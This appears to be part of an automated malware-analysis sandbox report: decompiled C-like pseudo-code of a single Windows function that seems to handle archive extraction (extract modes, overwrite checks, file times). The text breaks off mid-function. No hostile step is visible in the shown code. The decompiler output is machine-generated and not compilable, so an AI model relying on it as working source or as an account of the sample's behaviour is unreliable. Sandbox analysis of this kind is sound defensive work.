                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01218525, Relevance: 3.9, APIs: 2, Instructions: 945COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E01218525(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t371;
				signed int _t375;
				signed int _t376;
				signed int _t381;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t394;
				signed int _t395;
				signed int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t410;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t434;
				char _t436;
				char _t438;
				signed int _t439;
				signed int _t440;
				signed int _t462;
				signed int _t471;
				intOrPtr _t474;
				char _t481;
				signed int _t482;
				void* _t493;
				void* _t501;
				void* _t503;
				signed int _t513;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t522;
				signed int _t525;
				signed int _t533;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed int _t549;
				signed char _t550;
				signed int _t553;
				void* _t558;
				signed int _t566;
				intOrPtr* _t577;
				intOrPtr _t579;
				signed int _t580;
				signed int _t590;
				intOrPtr _t593;
				signed int _t596;
				signed int _t605;
				signed int _t612;
				signed int _t614;
				signed int _t615;
				signed int _t617;
				signed int _t635;
				signed int _t636;
				void* _t643;
				void* _t644;
				signed int _t660;
				signed int _t671;
				intOrPtr _t672;
				void* _t674;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t685;
				intOrPtr _t687;
				signed int _t692;
				intOrPtr _t694;
				signed int _t697;
				signed int _t702;
				void* _t706;
				void* _t708;
				void* _t710;

				_t579 = __ecx;
				E0122E0E4(E01241C8A, _t706);
				E0122E1C0();
				_t577 =  *((intOrPtr*)(_t706 + 8));
				_t670 = 0;
				_t687 = _t579;
				 *((intOrPtr*)(_t706 - 0x20)) = _t687;
				_t371 =  *( *(_t687 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t371;
				if( *((intOrPtr*)(_t706 + 0xc)) != 0) {
					L6:
					_t694 =  *((intOrPtr*)(_t577 + 0x21dc));
					__eflags = _t694 - 2;
					if(_t694 == 2) {
						 *(_t687 + 0x10f5) = _t670;
						__eflags =  *(_t577 + 0x32dc) - _t670;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t577 + 0x32e4) - _t670;
							if(__eflags > 0) {
								L26:
								_t580 =  *(_t687 + 8);
								__eflags =  *((intOrPtr*)(_t580 + 0x615c)) - _t670;
								if( *((intOrPtr*)(_t580 + 0x615c)) != _t670) {
									L29:
									 *(_t706 - 0x13) = _t670;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x13; // 0x7ed
									_t375 = E01215E0A(_t577 + 0x2280, _t36, 6, _t670, _t35, 0x800);
									__eflags = _t375;
									_t376 = _t375 & 0xffffff00 | _t375 != 0x00000000;
									 *(_t706 - 0x12) = _t376;
									__eflags = _t376;
									if(_t376 != 0) {
										__eflags =  *(_t706 - 0x13);
										if( *(_t706 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t687 + 0xf1)) = 0;
										}
									}
									E0121205D(_t577);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t577 + 0x22a8);
									E0121B223();
									__eflags =  *((char*)(_t577 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t577 + 0x3373)) == 0) {
										_t381 = E01212147(_t577);
										__eflags = _t381;
										if(_t381 == 0) {
											_t550 =  *(_t687 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t550 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x12;
											 *_t61 =  *(_t706 - 0x12) &  !_t550;
											__eflags =  *_t61;
										}
									} else {
										_t553 =  *( *(_t687 + 8) + 0x72bc);
										__eflags = _t553 - 1;
										if(_t553 != 1) {
											__eflags =  *(_t706 - 0x13);
											if( *(_t706 - 0x13) == 0) {
												__eflags = _t553;
												 *(_t706 - 0x12) =  *(_t706 - 0x12) & (_t553 & 0xffffff00 | _t553 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t558 = E0121BB74(_t54);
												_t660 =  *(_t687 + 8);
												__eflags =  *((intOrPtr*)(_t660 + 0x72bc)) - 1 - _t558;
												if( *((intOrPtr*)(_t660 + 0x72bc)) - 1 != _t558) {
													 *(_t706 - 0x12) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E0121BB74(_t57);
												}
											}
										}
									}
									 *((char*)(_t687 + 0x5f)) =  *((intOrPtr*)(_t577 + 0x3319));
									 *((char*)(_t687 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *0x1242260( *((intOrPtr*)(_t577 + 0x6ca8)) -  *(_t577 + 0x32d8),  *((intOrPtr*)(_t577 + 0x6cac)), 0);
									 *((intOrPtr*)( *_t577 + 0x10))();
									_t671 = 0;
									_t387 = 0;
									 *(_t706 - 0xe) = 0;
									 *(_t706 - 0x24) = 0;
									__eflags =  *(_t706 - 0x12);
									if( *(_t706 - 0x12) != 0) {
										L43:
										_t697 =  *(_t706 - 0x18);
										_t590 =  *((intOrPtr*)( *(_t687 + 8) + 0x61f9));
										_t389 = 0x49;
										__eflags = _t590;
										if(_t590 == 0) {
											L45:
											_t390 = _t671;
											L46:
											__eflags = _t590;
											_t83 = _t706 - 0x113c; // -2364
											_t394 = L012212D1(_t590, _t83, (_t390 & 0xffffff00 | _t590 == 0x00000000) & 0x000000ff, _t390,  *(_t706 - 0x24)); // executed
											__eflags = _t394;
											if(__eflags == 0) {
												L219:
												_t395 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t395;
											}
											_push(0x800);
											 *((intOrPtr*)(_t706 - 0x38)) = _t687 + 0x10f6;
											_t86 = _t706 - 0x113c; // -2364
											E01218214(__eflags, _t577, _t86, _t687 + 0x10f6);
											__eflags =  *(_t706 - 0xe);
											if( *(_t706 - 0xe) != 0) {
												L50:
												 *(_t706 - 0xd) = 0;
												L51:
												_t400 =  *(_t687 + 8);
												_t593 = 0x45;
												__eflags =  *((char*)(_t400 + 0x6153));
												_t672 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t593;
												 *((intOrPtr*)(_t706 - 0x30)) = _t672;
												if( *((char*)(_t400 + 0x6153)) != 0) {
													L53:
													__eflags = _t697 - _t593;
													if(_t697 == _t593) {
														L55:
														_t97 = _t706 - 0x31a8; // -10664
														E01217098(_t97);
														_push(0);
														_t98 = _t706 - 0x31a8; // -10664
														_t405 = E0121A406(_t97, _t672, __eflags, _t687 + 0x10f6, _t98);
														__eflags = _t405;
														if(_t405 == 0) {
															_t406 =  *(_t687 + 8);
															__eflags =  *((char*)(_t406 + 0x6153));
															_t109 = _t706 - 0xd;
															 *_t109 =  *(_t706 - 0xd) & (_t406 & 0xffffff00 |  *((char*)(_t406 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t109;
															L61:
															_t111 = _t706 - 0x113c; // -2364
															_t410 = E01217D45(_t111, _t577, _t111);
															__eflags = _t410;
															if(_t410 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t577 + 0x331b));
																	if( *((char*)(_t577 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t116 = _t706 - 0x113c; // -2364
																	_t543 = E012181E0(_t687, _t577);
																	__eflags = _t543;
																	if(_t543 == 0) {
																		 *((char*)(_t687 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t118 = _t706 - 0x13c; // 0x6c4
																	_t700 =  *(_t687 + 8) + 0x5024;
																	_t596 = 0x40;
																	memcpy(_t118,  *(_t687 + 8) + 0x5024, _t596 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t121 = _t706 - 0x28; // 0x7d8
																	_t687 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t128 = _t706 - 0x13c; // 0x6c4
																	E0121C8D1(_t687 + 0x10, 0,  *((intOrPtr*)(_t577 + 0x331c)), _t128,  ~( *(_t577 + 0x3320) & 0x000000ff) & _t577 + 0x00003321, _t577 + 0x3331,  *((intOrPtr*)(_t577 + 0x336c)), _t577 + 0x334b, _t121);
																	__eflags =  *((char*)(_t577 + 0x331b));
																	if( *((char*)(_t577 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t147 = _t706 - 0x13c; // 0x6c4
																		L0121E9F4(_t147);
																		_t148 = _t706 - 0x2160; // -6496
																		E012195B6(_t148);
																		_t420 =  *(_t577 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x2c) = _t420;
																		_t674 = 0x50;
																		__eflags = _t420;
																		if(_t420 == 0) {
																			L83:
																			_t421 = E01212147(_t577);
																			__eflags = _t421;
																			if(_t421 == 0) {
																				_t605 =  *(_t706 - 0xd);
																				__eflags = _t605;
																				if(_t605 == 0) {
																					_t700 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t577 + 0x6cb4));
																					if( *((char*)(_t577 + 0x6cb4)) == 0) {
																						__eflags = _t605;
																						if(_t605 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t359 = _t706 - 0x2160; // -6496
																							E012195E8(_t359, _t700);
																							__eflags =  *(_t706 - 0x12);
																							_t387 =  *(_t706 - 0xd);
																							_t675 =  *(_t706 - 0xe);
																							if( *(_t706 - 0x12) != 0) {
																								_t363 = _t687 + 0xec;
																								 *_t363 =  *(_t687 + 0xec) + 1;
																								__eflags =  *_t363;
																							}
																							L214:
																							__eflags =  *((char*)(_t687 + 0x60));
																							if( *((char*)(_t687 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t387;
																							if(_t387 != 0) {
																								L15:
																								_t395 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t577 + 0x6cb4)) - _t387;
																							if( *((intOrPtr*)(_t577 + 0x6cb4)) != _t387) {
																								__eflags = _t675;
																								if(_t675 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E01211F0A(_t577);
																							goto L15;
																						}
																						L101:
																						_t424 =  *(_t687 + 8);
																						__eflags =  *((char*)(_t424 + 0x61f9));
																						if( *((char*)(_t424 + 0x61f9)) == 0) {
																							L103:
																							_t425 =  *(_t706 - 0xe);
																							__eflags = _t425;
																							if(_t425 != 0) {
																								L108:
																								 *((char*)(_t706 - 0x11)) = 1;
																								__eflags = _t425;
																								if(_t425 != 0) {
																									L110:
																									 *((intOrPtr*)(_t687 + 0xe8)) =  *((intOrPtr*)(_t687 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t687 + 0x80)) = 0;
																									 *((intOrPtr*)(_t687 + 0x84)) = 0;
																									 *((intOrPtr*)(_t687 + 0x88)) = 0;
																									 *((intOrPtr*)(_t687 + 0x8c)) = 0;
																									E0121A9C8(_t687 + 0xc8, _t674,  *((intOrPtr*)(_t577 + 0x32f0)),  *((intOrPtr*)( *(_t687 + 8) + 0x82d8))); // executed
																									E0121A9C8(_t687 + 0xa0, _t674,  *((intOrPtr*)(_t577 + 0x32f0)),  *((intOrPtr*)( *(_t687 + 8) + 0x82d8)));
																									_t700 = _t687 + 0x10;
																									 *(_t687 + 0x30) =  *(_t577 + 0x32d8);
																									_t218 = _t706 - 0x2160; // -6496
																									 *(_t687 + 0x34) =  *(_t577 + 0x32dc);
																									E0121C919(_t700, _t577, _t218);
																									_t676 =  *((intOrPtr*)(_t706 - 0x11));
																									_t612 = 0;
																									_t434 =  *(_t706 - 0xe);
																									 *((char*)(_t687 + 0x39)) = _t676;
																									 *((char*)(_t687 + 0x3a)) = _t434;
																									 *(_t706 - 0x24) = 0;
																									 *(_t706 - 0x1c) = 0;
																									__eflags = _t676;
																									if(_t676 != 0) {
																										L127:
																										_t677 =  *(_t687 + 8);
																										__eflags =  *((char*)(_t677 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t677 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0x11));
																										if( *((char*)(_t706 - 0x11)) != 0) {
																											L131:
																											_t436 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x2c);
																											 *((char*)(_t706 - 0x10)) = _t612;
																											 *((char*)(_t706 - 0x14)) = _t436;
																											 *((char*)(_t706 - 0xf)) = _t436;
																											if( *(_t706 - 0x2c) == 0) {
																												__eflags =  *(_t577 + 0x3318);
																												if( *(_t577 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t577 + 0x22a0));
																													if(__eflags != 0) {
																														E01222BB2(_t577,  *((intOrPtr*)(_t687 + 0xe0)), _t706,  *((intOrPtr*)(_t577 + 0x3374)),  *(_t577 + 0x3370) & 0x000000ff);
																														_t474 =  *((intOrPtr*)(_t687 + 0xe0));
																														 *(_t474 + 0x4c48) =  *(_t577 + 0x32e0);
																														__eflags = 0;
																														 *(_t474 + 0x4c4c) =  *(_t577 + 0x32e4);
																														 *((char*)(_t474 + 0x4c60)) = 0;
																														E01222861( *((intOrPtr*)(_t687 + 0xe0)),  *((intOrPtr*)(_t577 + 0x229c)),  *(_t577 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t577 + 0x32e4));
																														_push( *(_t577 + 0x32e0));
																														_push(_t700);
																														E01219283(_t577, _t677, _t687, __eflags);
																													}
																												}
																												L163:
																												E01211F0A(_t577);
																												__eflags =  *((char*)(_t577 + 0x3319));
																												if( *((char*)(_t577 + 0x3319)) != 0) {
																													L166:
																													_t438 = 0;
																													__eflags = 0;
																													_t614 = 0;
																													L167:
																													__eflags =  *(_t577 + 0x3370);
																													if( *(_t577 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t577 + 0x22a0));
																														if( *((char*)(_t577 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 - 0xe);
																															 *((char*)(_t706 - 0x10)) = _t438;
																															if( *(_t706 - 0xe) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x2c);
																																_t678 =  *((intOrPtr*)(_t706 - 0xf));
																																if( *(_t706 - 0x2c) == 0) {
																																	L189:
																																	_t615 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0x11));
																																	if( *((char*)(_t706 - 0x11)) != 0) {
																																		goto L212;
																																	}
																																	_t700 =  *(_t706 - 0x18);
																																	__eflags = _t700 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t700 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x2c);
																																		if( *(_t706 - 0x2c) == 0) {
																																			L197:
																																			__eflags = _t438;
																																			if(_t438 == 0) {
																																				L200:
																																				__eflags = _t615;
																																				if(_t615 != 0) {
																																					L208:
																																					_t439 =  *(_t687 + 8);
																																					__eflags =  *((char*)(_t439 + 0x61a0));
																																					if( *((char*)(_t439 + 0x61a0)) == 0) {
																																						_t700 = _t687 + 0x10f6;
																																						_t440 = E0121A384(_t687 + 0x10f6,  *((intOrPtr*)(_t577 + 0x22a4))); // executed
																																						__eflags = _t440;
																																						if(__eflags == 0) {
																																							E01217032(__eflags, 0x11, _t577 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t687 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t679 =  *(_t706 - 0x1c);
																																				__eflags = _t679;
																																				_t617 =  *(_t706 - 0x24);
																																				if(_t679 > 0) {
																																					L203:
																																					__eflags = _t438;
																																					if(_t438 != 0) {
																																						L206:
																																						_t332 = _t706 - 0x2160; // -6496
																																						E01219DFF(_t332);
																																						L207:
																																						_t700 = _t577 + 0x32d0;
																																						_t692 = _t577 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t340 = _t706 - 0x2160; // -6496
																																						E01219CA2(_t340, _t577 + 0x32d0,  ~( *( *(_t687 + 8) + 0x72c8)) & _t692,  ~( *( *(_t687 + 8) + 0x72cc)) & _t577 + 0x000032c8,  ~( *( *(_t687 + 8) + 0x72d0)) & _t577 + 0x000032d0);
																																						_t341 = _t706 - 0x2160; // -6496
																																						E01219670(_t341);
																																						E01217BAA( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t577,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t692;
																																						E01219C9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t692,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t692,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t577 + 0x000032d0);
																																						_t687 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t687 + 0x88)) - _t617;
																																					if( *((intOrPtr*)(_t687 + 0x88)) != _t617) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t687 + 0x8c)) - _t679;
																																					if( *((intOrPtr*)(_t687 + 0x8c)) == _t679) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t617;
																																				if(_t617 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t462 =  *(_t687 + 8);
																																			__eflags =  *((char*)(_t462 + 0x6198));
																																			if( *((char*)(_t462 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t438 =  *((intOrPtr*)(_t706 - 0x10));
																																			goto L200;
																																		}
																																		__eflags = _t615;
																																		if(_t615 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t577 + 0x3380) - 5;
																																		if( *(_t577 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t678;
																																		if(_t678 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t700 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t700 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t577 + 0x3380) - 4;
																																if( *(_t577 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t678;
																																if(_t678 == 0) {
																																	goto L189;
																																}
																																_t615 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x14));
																															if( *((char*)(_t706 - 0x14)) == 0) {
																																goto L185;
																															}
																															__eflags = _t614;
																															if(_t614 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t577 + 0x331b)) - _t614;
																															if(__eflags == 0) {
																																L183:
																																_t312 = _t706 - 0x113c; // -2364
																																_push(_t577 + 0x1e);
																																_push(3);
																																L184:
																																E01217032(__eflags);
																																 *((char*)(_t706 - 0x10)) = 1;
																																E01216F5B(0x124ff50, 3);
																																_t438 =  *((intOrPtr*)(_t706 - 0x10));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t577 + 0x3341)) - _t614;
																															if( *((intOrPtr*)(_t577 + 0x3341)) == _t614) {
																																L181:
																																__eflags =  *((char*)(_t687 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t310 = _t706 - 0x113c; // -2364
																																_push(_t577 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t577 + 0x6cc4) - _t614;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t577 + 0x32e4) - _t438;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t614;
																															if(_t614 != 0) {
																																 *((char*)(_t687 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t577 + 0x32e0) - _t438;
																														if( *(_t577 + 0x32e0) <= _t438) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t687 + 0xf3)) = _t438;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t471 = E0121A996(_t687 + 0xc8, _t687, _t577 + 0x32f0,  ~( *(_t577 + 0x334a) & 0x000000ff) & _t577 + 0x0000334b);
																												__eflags = _t471;
																												if(_t471 == 0) {
																													goto L166;
																												}
																												_t614 = 1;
																												_t438 = 0;
																												goto L167;
																											}
																											_t700 =  *(_t577 + 0x3380);
																											__eflags = _t700 - 4;
																											if(__eflags == 0) {
																												L146:
																												_push(0x800);
																												_t263 = _t706 - 0x41a8; // -14760
																												E01218214(__eflags, _t577, _t577 + 0x3384, _t263);
																												_t612 =  *((intOrPtr*)(_t706 - 0x10));
																												__eflags = _t612;
																												if(_t612 == 0) {
																													L153:
																													_t481 =  *((intOrPtr*)(_t706 - 0xf));
																													L154:
																													__eflags =  *((intOrPtr*)(_t577 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t577 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t612;
																														if(_t612 == 0) {
																															L157:
																															_t482 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t687 + 0x10f5) = _t482;
																															goto L163;
																														}
																														L142:
																														__eflags = _t481;
																														if(_t481 == 0) {
																															goto L157;
																														}
																														_t482 = 1;
																														goto L158;
																													}
																													__eflags = _t612;
																													if(_t612 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x14)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t267 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t687 + 0x10f6);
																												__eflags = _t700 - 4;
																												if(__eflags != 0) {
																													_push(_t577 + 0x1e);
																													_t270 = _t706 - 0x2160; // -6496
																													_t481 = E012191C1(_t677, _t687, _t700, __eflags);
																												} else {
																													_t481 = E01217671(_t612, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xf)) = _t481;
																												__eflags = _t481;
																												if(_t481 == 0) {
																													L139:
																													_t612 =  *((intOrPtr*)(_t706 - 0x10));
																													goto L140;
																												}
																												_t612 =  *((intOrPtr*)(_t706 - 0x10));
																												goto L154;
																											}
																											__eflags = _t700 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t700 - _t436;
																											if(_t700 == _t436) {
																												L144:
																												__eflags = _t612;
																												if(_t612 == 0) {
																													goto L153;
																												}
																												_push(_t687 + 0x10f6);
																												_t481 = E012178E0(_t677, _t687 + 0x10, _t577);
																												goto L151;
																											}
																											__eflags = _t700 - 2;
																											if(_t700 == 2) {
																												goto L144;
																											}
																											__eflags = _t700 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E01217032(__eflags, 0x47, _t577 + 0x1e, _t687 + 0x10f6);
																											__eflags = 0;
																											_t481 = 0;
																											 *((char*)(_t706 - 0xf)) = 0;
																											goto L139;
																										}
																										__eflags = _t434;
																										if(_t434 != 0) {
																											goto L131;
																										}
																										_t493 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t493;
																										if( *(_t706 - 0x18) == _t493) {
																											goto L131;
																										}
																										_t436 = 1;
																										_t612 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t577 + 0x6cc4);
																									if( *(_t577 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t702 =  *(_t577 + 0x32e4);
																									_t685 =  *(_t577 + 0x32e0);
																									__eflags = _t702;
																									if(__eflags < 0) {
																										L126:
																										_t700 = _t687 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t635 =  *(_t577 + 0x32d8);
																										_t636 = _t635 << 0xa;
																										__eflags = ( *(_t577 + 0x32dc) << 0x00000020 | _t635) << 0xa - _t702;
																										if(__eflags < 0) {
																											L125:
																											_t434 =  *(_t706 - 0xe);
																											_t612 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t702;
																											if(__eflags < 0) {
																												L124:
																												_t238 = _t706 - 0x2160; // -6496
																												E01219ABD(_t238,  *(_t577 + 0x32e0),  *(_t577 + 0x32e4));
																												 *(_t706 - 0x24) =  *(_t577 + 0x32e0);
																												 *(_t706 - 0x1c) =  *(_t577 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t501 = E01219885(_t685);
																												__eflags = _t685 -  *(_t577 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t501 -  *(_t577 + 0x32d8);
																												if(_t501 <=  *(_t577 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t685 - 0x5f5e100;
																											if(_t685 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t636 - _t685;
																										if(_t636 <= _t685) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t685 - 0xf4240;
																									if(_t685 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t199 = _t687 + 0xe4;
																								 *_t199 =  *(_t687 + 0xe4) + 1;
																								__eflags =  *_t199;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0x11)) = 0;
																							_t503 = 0x50;
																							__eflags = _t700 - _t503;
																							if(_t700 != _t503) {
																								_t193 = _t706 - 0x2160; // -6496
																								__eflags = E01219929(_t193);
																								if(__eflags != 0) {
																									E01217032(__eflags, 0x3b, _t577 + 0x1e, _t687 + 0x10f6);
																									E01216FF6(0x124ff50, _t706, _t577 + 0x1e, _t687 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t687 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t424 + 0x61f9));
																						if( *((char*)(_t424 + 0x61f9)) != 0) {
																							_t425 =  *(_t706 - 0xe);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 - 0xe) = 1;
																					 *(_t706 - 0xd) = 1;
																					_t183 = _t706 - 0x113c; // -2364
																					_t513 = L012212D1(_t605, _t183, 0, 0, 1);
																					__eflags = _t513;
																					if(_t513 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t185 = _t706 - 0x2160; // -6496
																					E012195E8(_t185, _t700);
																					_t395 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t175 = _t706 - 0x2160; // -6496
																				_push(_t577);
																				_t517 = E012180C2(_t687);
																				_t700 =  *(_t706 - 0x18);
																				_t605 = _t517;
																				 *(_t706 - 0xd) = _t605;
																				L93:
																				__eflags = _t605;
																				if(_t605 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 - 0xd);
																			if( *(_t706 - 0xd) != 0) {
																				_t518 =  *(_t706 - 0x18);
																				__eflags = _t518 - 0x50;
																				if(_t518 != 0x50) {
																					_t643 = 0x49;
																					__eflags = _t518 - _t643;
																					if(_t518 != _t643) {
																						_t644 = 0x45;
																						__eflags = _t518 - _t644;
																						if(_t518 != _t644) {
																							_t519 =  *(_t687 + 8);
																							__eflags =  *((intOrPtr*)(_t519 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t519 + 0x6158)) != 1) {
																								 *(_t687 + 0xe4) =  *(_t687 + 0xe4) + 1;
																								_t173 = _t706 - 0x113c; // -2364
																								_push(_t577);
																								E01217EFE(_t687);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t420 - 5;
																		if(_t420 == 5) {
																			goto L83;
																		}
																		_t605 =  *(_t706 - 0xd);
																		_t700 =  *(_t706 - 0x18);
																		__eflags = _t605;
																		if(_t605 == 0) {
																			goto L96;
																		}
																		__eflags = _t700 - _t674;
																		if(_t700 == _t674) {
																			goto L93;
																		}
																		_t522 =  *(_t687 + 8);
																		__eflags =  *((char*)(_t522 + 0x61f9));
																		if( *((char*)(_t522 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0x11)) = 0;
																		_t525 = E0121A0C0(_t687 + 0x10f6);
																		__eflags = _t525;
																		if(_t525 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0x11));
																			if( *((char*)(_t706 - 0x11)) == 0) {
																				_t605 =  *(_t706 - 0xd);
																				goto L93;
																			}
																			L82:
																			_t605 = 0;
																			 *(_t706 - 0xd) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0x11));
																		if( *((char*)(_t706 - 0x11)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t577 + 0x32c0);
																		_t161 = _t706 - 0x11; // 0x7ef
																		E01219314(0,  *(_t687 + 8), 0, _t687 + 0x10f6, 0x800, _t161,  *(_t577 + 0x32e0),  *(_t577 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t577 + 0x3341));
																	if( *((char*)(_t577 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t133 = _t706 - 0x28; // 0x7d8
																	_t533 = E0122FC4A(_t577 + 0x3342, _t133, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t533;
																	if(_t533 == 0) {
																		goto L73;
																	}
